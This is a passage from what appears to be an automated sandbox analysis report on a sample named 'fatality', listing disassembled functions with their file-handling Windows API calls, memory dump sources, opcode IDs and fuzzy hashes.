                                                                    • Instruction Fuzzy Hash: E0C1A338B002949FEF15EF6AC884BAD7BA5EF16310F1841B9EC45DB296DB309944CB71
                                                                    Function 00DE3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 0bd758690314707bd7e46a7b8268dc12c445505a6892ee28af53881a1cb7c1ec
                                                                    • Instruction ID: fedeba27c581d1e2c6305fc8f0aaba5e0e6254a4a74e5dd21d69d569cec9731b
                                                                    • Opcode Fuzzy Hash: 0bd758690314707bd7e46a7b8268dc12c445505a6892ee28af53881a1cb7c1ec
                                                                    • Instruction Fuzzy Hash: DF71C171500B849ECB25EB71C8559F7B7E9EF14301F44496EF2AB87241DA32AA84CF31
                                                                    Function 00DE9A74 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00DE9A50,?,?,00000000,?,?,00DE8CBC,?), ref: 00DE9BAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 025c9a61c2484eb0af231694b7a107f3b289b8cfd1d0fd35e1294cdb1b698b68
                                                                    • Instruction ID: 5ebccf4588636935698c8451942ba463a5c3ad9f9502bddb316e74bb9c198455
                                                                    • Opcode Fuzzy Hash: 025c9a61c2484eb0af231694b7a107f3b289b8cfd1d0fd35e1294cdb1b698b68
                                                                    • Instruction Fuzzy Hash: 9141B0705063818FDB24EF2AE5E446AF7E6FFD4320F198A2DE89583260D770ED448A71
                                                                    Function 00DE8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE8289
                                                                      • Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1
                                                                      • Part of subcall function 00DEA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog$CloseFind
                                                                    • String ID:
                                                                    • API String ID: 2506663941-0
                                                                    • Opcode ID: 0546bea390d46c8069707a142cc20ec2fc9b01b0392e8f8eccfab0331fff27ba
                                                                    • Instruction ID: 741cd96568f3422243b9f3296552ff0d36a2377d58c7b24b07051fb5b12bbdd1
                                                                    • Opcode Fuzzy Hash: 0546bea390d46c8069707a142cc20ec2fc9b01b0392e8f8eccfab0331fff27ba
                                                                    • Instruction Fuzzy Hash: 4941B8719446989ADB20FBA1CC55AE9B7B8EF00304F4444EAE18EA7093EB715FC5DB70
                                                                    Function 00DE98E0 Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?), ref: 00DE995F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 266351315fb0a896ae09962a87244341570546ce2bb2d9fc005617c84a8dfacb
                                                                    • Instruction ID: b5faa430df199448088d46f456de34db9af0619b2350241bf5eee5f77655acb0
                                                                    • Opcode Fuzzy Hash: 266351315fb0a896ae09962a87244341570546ce2bb2d9fc005617c84a8dfacb
                                                                    • Instruction Fuzzy Hash: B13113305453856FE730AF26CC46BEAFBD4BB04320F141B19F9A1961D2D3A4A988CFB1
                                                                    Function 00DE9F7A Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,00DED343,00000001,?,?,?), ref: 00DEA011
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 81386bf007db3ec8e31e0d96200f7cf78a72da9a6e59b311357426e638befdc2
                                                                    • Instruction ID: 911c6bdd330fb2860369fceabd6dc5bc0384190d86964decabc47f8f733f6f61
                                                                    • Opcode Fuzzy Hash: 81386bf007db3ec8e31e0d96200f7cf78a72da9a6e59b311357426e638befdc2
                                                                    • Instruction Fuzzy Hash: 5D31E231204386AFDB14EF26D818BAEB7A5FF84715F04491DF981A7290C775AD48CBB2
                                                                    Function 00DE13DC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DE13E1
                                                                      • Part of subcall function 00DE5E37: __EH_prolog.LIBCMT ref: 00DE5E3C
                                                                      • Part of subcall function 00DECE40: __EH_prolog.LIBCMT ref: 00DECE45
                                                                      • Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: db921f9f082a7566b03b5a7aa03ddb5efb4056ca758e6d26da822371d8b379ec
                                                                    • Instruction ID: 92a8b0caf772543027e686aea588770d80b3639bdd5a3e24a1fc1bf578b47304
                                                                    • Opcode Fuzzy Hash: db921f9f082a7566b03b5a7aa03ddb5efb4056ca758e6d26da822371d8b379ec
                                                                    • Instruction Fuzzy Hash: 49413FB0905B809ED724DF798885AE6FBE5FF19310F504A2EE5FE83281C7316654CB20
                                                                    Function 052566F9 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 05256708
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcessUser
                                                                    • String ID:
                                                                    • API String ID: 3902816426-0
                                                                    • Opcode ID: 074a540362b7bcb0a1215722ec7a442ef9ddde77df610534b8dfe348269c24b6
                                                                    • Instruction ID: 7b05ac4e2a0c1cf201e0e93062442e5a28912a31ff9526828c5a3db303807928
                                                                    • Opcode Fuzzy Hash: 074a540362b7bcb0a1215722ec7a442ef9ddde77df610534b8dfe348269c24b6
                                                                    • Instruction Fuzzy Hash: EC3118B2D1060CEFDB00DFD1C944BDEBBB9FB54336F20461AE425A6180D7786A088F60
                                                                    Function 00DFB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DFB098
                                                                      • Part of subcall function 00DE13DC: __EH_prolog.LIBCMT ref: 00DE13E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 128f4f01cfa15ba7dedf7425246314ea029b7f9ed0acaae6312fb836068cbb10
                                                                    • Instruction ID: 90e861aa1d2e47a5927c88e86dec2cd4601707f1c9f6119b5b5273a2cfb7a532
                                                                    • Opcode Fuzzy Hash: 128f4f01cfa15ba7dedf7425246314ea029b7f9ed0acaae6312fb836068cbb10
                                                                    • Instruction Fuzzy Hash: 41316A759002499ACB15EF65C851AFEBBB4AF09300F14849EE409B7282D735AE04CBB1
                                                                    Function 00DE9DA2 Relevance: 1.6, APIs: 1, Instructions: 83timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00DE9E70
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileTime
                                                                    • String ID:
                                                                    • API String ID: 1425588814-0
                                                                    • Opcode ID: b91b93d1122c9a7b2622643343fe4d108940e370b2582dd02d9394881236eb39
                                                                    • Instruction ID: ac5be0775c8bab2a475124269c3e2d745596ccf85b1e3da9a6b2bfad391d34ae
                                                                    • Opcode Fuzzy Hash: b91b93d1122c9a7b2622643343fe4d108940e370b2582dd02d9394881236eb39
                                                                    • Instruction Fuzzy Hash: F521D03224A295EFC714EF76C8A1AABFBE4AF95704F08891CF4C587141D329E90D9B71
                                                                    Function 00DE966E Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00DE9F27,?,?,00DE771A), ref: 00DE96E6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 0779821edadc3b7397cfe1dd102d52c20e9215857b03a4a1975002dba085dc09
                                                                    • Instruction ID: 3bbf658b08e3b857b5d96dc98c1b5e22efd22e5a8393c56401cee8d2d43ede4d
                                                                    • Opcode Fuzzy Hash: 0779821edadc3b7397cfe1dd102d52c20e9215857b03a4a1975002dba085dc09
                                                                    • Instruction Fuzzy Hash: 5321CF71100384AFE330AA66CC89BF7B7ECEB49324F044A1EFAD5C21D1C774A8848671
                                                                    Function 00DE9785 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,00DE9C22,?,?,00000000,00000800,?), ref: 00DE97AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 7639ec737557fc8c77ea519868d9ccc75bc77c5eaa6911638122014a52862e0f
                                                                    • Instruction ID: d3a750da6a18d918a799e8a0d2f98d684e3a56c7afad4c85002c302b8d00b631
                                                                    • Opcode Fuzzy Hash: 7639ec737557fc8c77ea519868d9ccc75bc77c5eaa6911638122014a52862e0f
                                                                    • Instruction Fuzzy Hash: 7F11CE30912244EBDF20BF37C854AAEBBA9FF06360F148929F456952A0D770CE48DB71
                                                                    Function 00DE9E80 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00DE9EC7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 1c2cb3c0fe4c1bb5b6e7682f38459c39489cb43573997d9055f7e12e2f508b60
                                                                    • Instruction ID: 7f67a052266c8274f808a46c143c5db06af3ecfab548266353880778402370e3
                                                                    • Opcode Fuzzy Hash: 1c2cb3c0fe4c1bb5b6e7682f38459c39489cb43573997d9055f7e12e2f508b60
                                                                    • Instruction Fuzzy Hash: 55112530602740ABD734E63ACC51BAAF3E8AB44760F544A29F652E26D0E3B0ED49C770
                                                                    Function 00DEA2B2 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00DEC27E: _wcslen.LIBCMT ref: 00DEC284
                                                                    • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,00DEA175,?,00000001,00000000,?,?), ref: 00DEA2D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
